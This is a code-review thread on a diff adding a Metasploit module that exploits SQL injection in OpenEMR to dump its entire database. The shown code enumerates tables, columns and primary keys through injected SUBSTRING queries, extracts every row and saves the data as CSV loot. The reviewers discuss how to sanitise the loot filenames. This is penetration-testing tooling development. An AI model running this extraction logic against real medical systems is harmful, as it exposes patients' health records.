modules/auxiliary/sqli/openemr/openemr_sqli_dump.rb

```diff
@@ -0,0 +1,235 @@
+      where_clause = 'WHERE ' + not_in_clause
+    elsif !where_clause.empty? && not_in_clause.empty?
+      where_clause = 'WHERE ' + where_clause
+    end
+    where_clause
+  end
+
+  def fetch_complete(column_name, table_name, where_condition, not_in_clause)
+    offset = 0
+    reconstructed_value = ''
+    loop do
+      where_clause = complete_where_clause(where_condition, not_in_clause)
+      payload = "SELECT SUBSTRING(#{column_name}, #{(offset * 31) + 1}) FROM #{table_name} #{where_clause} LIMIT 1"
+      value = exec_payload_and_parse(payload)
+      reconstructed_value += value unless value.nil?
+      break if value.nil? || value.empty? || value.length < 31
+
+      offset += 1
+    end
+    reconstructed_value
+  end
+
+  def enumerate_iteratively(column_name, table_name, where_condition)
+    values = []
+
+    loop do
+      values_sql_string = "'" + values.join("','") + "'"
+      not_in_clause = !values.empty? ? "#{column_name} NOT IN (#{values_sql_string})" : ''
+      value = fetch_complete(column_name, table_name, where_condition, not_in_clause)
+      break if value.nil? || value.empty?
+
+      values.push(value)
+    end
+    values
+  end
+
+  def enumerate_tables
+    enumerate_iteratively('table_name',
+                          'information_schema.TABLES',
+                          '')
+  end
+
+  def enumerate_columns(table)
+    enumerate_iteratively('column_name',
+                          'information_schema.COLUMNS',
+                          "table_name = '#{table}'")
+  end
+
+  def find_primary_key(table)
+    fetch_complete('column_name',
+                   'information_schema.KEY_COLUMN_USAGE',
+                   "table_name = '#{table}' AND CONSTRAINT_NAME ='PRIMARY'",
+                   '')
+  end
+
+  def walk_table(table)
+    primary_key = find_primary_key(table)
+    columns = enumerate_columns(table)
+
+    return if primary_key.nil?
+
+    key_values = enumerate_iteratively(primary_key,
+                                       table,
+                                       '')
+
+    data = [columns]
+    key_values.each do |key_value|
+      row = []
+      columns.each do |column|
+        where_condition = "#{primary_key} = #{key_value}"
+        value = fetch_complete(column, table, where_condition, '')
+        row.append(value)
+      end
+      data.append(row)
+    end
+    data
+  end
+
+  def save_csv(data, filename)
+    CSV.open(filename, 'w+') do |csv|
+      data.each do |row|
+        csv << row
+      end
+    end
+  end
+
+  def dump_all
+    payload = 'version()'
+    db_version = exec_payload_and_parse(payload)
+    print_status("DB Version: #{db_version}")
+    print_status('Enumerating Tables, this may take a moment...')
+    tables = enumerate_tables
+    num_tables = tables.length
+    print_status("Identified #{num_tables} tables.")
+
+    count = 1
+    rand_token = rand(36**8).to_s(36)
+    dump_dir = File.join(Msf::Config.loot_directory, 'openemr-' + rand_token)
```

Comment:
Ideally the `store_loot` should be used, rather than creating a directory. Especially when the filenames are constructed from arbitrary data returned from the server.

Reply:
In the latest commit the tablename has non-alphanumeric characters removed before become part of the `ltype` param passed to `store_loot`.  This makes the filename in the loot directory contain some information about what table it represents if `msfconsole` is not configured with a database.  If this is still unadvisable we could remove the tablename from the `ltype`, but it would be hard for someone to meaningfully navigate the loot without having the database connected to metasploit.

Reply:
From an ideological standpoint, is loot only meant to be accessed via `msfconsole` or should a user be able to meaningfully access loot via the filesystem?  If loot is only meant to be accessed via `msfconsole` that would favor using a static `ltype` which would make the user unable to meaningfully sift through the loot files on a per-dumped-table basis, but would be a standard usage of `store_loot`.

Reply:
Loot should reasonably be accessible via both `msfconsole` and the filesystem.

I defer to someone else on this topic.

Reply:
All right, I have a handle on this.  

The filename for a loot file is created using the following lines of code in the `store_loot` function.

```
    name =
      Time.now.strftime("%Y%m%d%H%M%S") + "_" + ws + "_" +
      (host || 'unknown') + '_' + ltype[0,16] + '_' +
      Rex::Text.rand_text_numeric(6) + '.' + ext

    name.gsub!(/[^a-z0-9\.\_]+/i, '')

    path = File.join(Msf::Config.loot_directory, name)
    full_path = ::File.expand_path(path)
```
The first 16 characters of `ltype` are used so I create the `ltype` with what boils down to the following code, where `table` is the name of the database table:
```
safe_table = table.gsub(/[^a-z0-9\.\_]+/i, '')
ltype = "openemr.#{safe_table}.dump"
```
The pattern passed to `gsub` is the same used by `store_loot` so no characters are lost from the `ltype` inside of `store_loot`.

In this way we are able to have the filename contain the first 8 characters of the tablename, while the first 8 characters denote the loot as openemr loot (`openemr.`).  Since we can only contribute 16 characters to the filename created by `store_loot`, this seems like a good trade-off of being able to determine what table the file represents, and also distinctly representing the loot as openemr loot.

In the case that the database is connected, the user can see the filename in the form of `tablename.csv`, which is even easier.

Reply:
I like this approach and think it's an effective way of helping the user with and without a db. Thanks for keeping both scenarios in mind!